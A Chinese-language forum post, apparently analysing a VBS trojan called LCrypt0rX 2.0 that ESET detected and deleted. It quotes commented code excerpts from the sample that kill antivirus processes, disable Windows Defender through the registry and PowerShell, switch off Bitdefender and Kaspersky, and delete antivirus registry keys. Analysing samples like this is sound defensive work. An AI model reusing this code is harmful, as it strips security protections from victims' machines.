本帖最后由 ulyanov2233 于 2025-10-4 17:57 编辑
essp 解压后kill2025/10/4 17:44:21;文件系统实时防护;文件;C:\Users\Y8219\Downloads\LCrypt0rX 2.0\LCrypt0rX 2.0.vbs;VBS/Agent.TAO 特洛伊木马;已通过删除清除;FIREFLY\Y8219;在通过应用程序创建的新文件上发生了事件: C:\Program Files\WinRAR\WinRAR.exe (4B95046B78C08FF2048F9CCD4186BC8BBDC0BFEF).;77018033AACAC7A80D79076EDAB61DE89B6D9AB2;2025/10/4 17:44:12;; ' 第一次终止防护进程
arrProcesses = Array("MsMpEng.exe", ...) ' MsMpEng.exe是Windows Defender核心进程
For Each procName In arrProcesses
For Each proc In objWMI.ExecQuery("Select * from Win32_Process where Name="" & procName & """)
proc.Terminate ' 强制终止进程
Next
Next
' 后续在循环中持续终止(防止杀毒软件重启)
advapi32_ext.WriteLine " WshShell.Run ""taskkill /IM MsMpEng.exe /F"", 0, True" ' Windows Defender
advapi32_ext.WriteLine " WshShell.Run ""taskkill /IM avp.exe /F"", 0, True" ' 卡巴斯基
advapi32_ext.WriteLine " WshShell.Run ""taskkill /IM AvastSvc.exe /F"", 0, True" ' Avast
advapi32_ext.WriteLine " WshShell.Run ""taskkill /IM avgsvc.exe /F"", 0, True" ' AVG
advapi32_ext.WriteLine " WshShell.Run ""taskkill /IM NortonSecurity.exe /F"", 0, True" ' 诺顿
' 其他杀毒软件进程... ' 禁用Windows Defender实时防护
WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware", 1, "REG_DWORD"
WshShell.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware", 1, "REG_DWORD"
' 后续通过PowerShell进一步禁用实时监控
objShell.Run "powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true", 0, True ' 禁用Bitdefender
objShell.Run "cmd /c ""C:\Program Files\Bitdefender\Bitdefender 2025\bdnserv.exe"" -disable", 0, True
' 禁用卡巴斯基
objShell.Run "cmd /c ""C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 2025\avp.com"" disable", 0, True Sub DeleteAVRegistry(sh)
Dim avKeys, key
avKeys = Array("Kaspersky","Bitdefender","Avast","AVG","Norton","ESET") ' 主流杀毒软件厂商
For Each key In avKeys
On Error Resume Next
' 删除系统级和用户级的杀毒软件注册表项
sh.RegDelete "HKLM\SOFTWARE\" & key & """"
sh.RegDelete "HKCU\SOFTWARE\" & key & """"
Next
End Sub
|
发表于 
楼主
误会360了
